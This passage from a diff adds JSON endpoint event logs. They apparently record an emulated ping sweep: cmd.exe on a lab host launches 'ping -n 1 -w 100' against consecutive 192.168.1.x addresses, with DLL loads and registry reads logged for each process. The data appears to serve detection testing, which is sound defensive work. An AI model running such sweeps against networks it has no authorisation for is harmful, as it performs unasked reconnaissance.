"{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "event_type": "process", + 
"pid": 4564, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572331990000, + "unique_pid": "{42FC7E13-CB70-5C05-0000-0010622F5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.73", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7992, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + 
"unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572332140000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "event_type": "process", + "pid": 7992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-0010F3315201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.74", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1640, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572336970000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": 
"{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572336980000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "event_type": "process", + "pid": 1640, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572341830000, + "unique_pid": "{42FC7E13-CB71-5C05-0000-001074345201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.75", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5696, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572341980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572341990000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "event_type": "process", + "pid": 5696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-001096375201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.76", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3708, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572346940000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346830000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572346980000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" 
+ }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572349340000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 3708, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572351840000, + "unique_pid": "{42FC7E13-CB72-5C05-0000-0010A03A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.77", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7576, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572351990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572351980000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "event_type": "process", + "pid": 7576, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-0010B23E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.78", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572356970000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356830000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572356990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "event_type": "process", + "pid": 4532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572361990000, + "unique_pid": "{42FC7E13-CB73-5C05-0000-00104B415201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.79", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5920, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572362130000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572361990000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": "{42FC7E13-CB74-5C05-0000-0010FC435201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5920, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572362140000, + "unique_pid": 